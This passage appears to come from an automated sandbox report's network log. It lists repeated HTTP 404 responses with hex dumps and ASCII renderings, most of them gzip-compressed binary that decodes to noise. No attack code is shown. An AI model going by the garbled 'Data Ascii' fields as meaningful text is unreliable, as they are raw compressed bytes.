61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 23 Oct 2024 15:13:34 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 23 Oct 2024 15:13:37 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 23 Oct 2024 15:13:39 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 23 Oct 2024 15:13:42 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:13:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:13:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:13:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:13:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:14:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3Scjo%2FVabtYhxFduxl0MmTf%2Fm01%2F1esAo%2ByFCsCGywZg%2FFdw53Dwj5JyLddQOpmBlLsMaSNDTuK9Qk2Mqcd8X5UEaIb5CaWFRfX%2BpW59JVz1jPq2lWKHRDreJP1jmLZS38yDO3ov25QBmlu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d72adb3395428d5-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2205&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:14:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C6gHeNQ%2FXdT0nnnlb61jLufWBDlhYwEe1bZI8RD8atF56sPsCi6zKHS8o%2FhWbwfZNnjIZdnJkZ7gG%2BMD4femU4NbUEFC9VIvk%2FWzcld%2Bf9x6x6O5Is7tOwe6XxS%2BVnUgm0uwPNwT%2FVq6C0mL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d72adc32a12e7bf-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1545&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=816&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:14:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCedY0IpNtnD0BCpO%2FBw1%2BOB0LBIzNn7SHy9ylSHOlEQJRKp85UN2Vgr6zKaqdiK%2Flw7%2BPRVjHmUay49V%2FMvxLN8Y18iPJtDyC7eKHCxqVEJUP2UxLroZ8cg5JE%2B81e5WaKNGukWrElBnq2y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d72add41ae94632-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1784&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1833&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
